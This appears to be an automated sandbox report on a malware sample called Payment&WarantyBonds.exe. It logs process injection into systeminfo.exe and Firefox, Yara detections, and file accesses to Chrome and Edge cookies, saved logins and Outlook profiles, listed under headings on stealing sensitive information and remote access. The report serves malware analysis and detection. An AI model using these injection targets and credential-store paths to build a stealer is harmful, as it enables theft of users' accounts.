                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory written: C:\Users\user\Desktop\Payment&WarantyBonds.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: read write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systeminfo.exe Thread register set: target process: 5856
                Source: C:\Windows\SysWOW64\systeminfo.exe Thread APC queued: target process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\systeminfo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\systeminfo.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
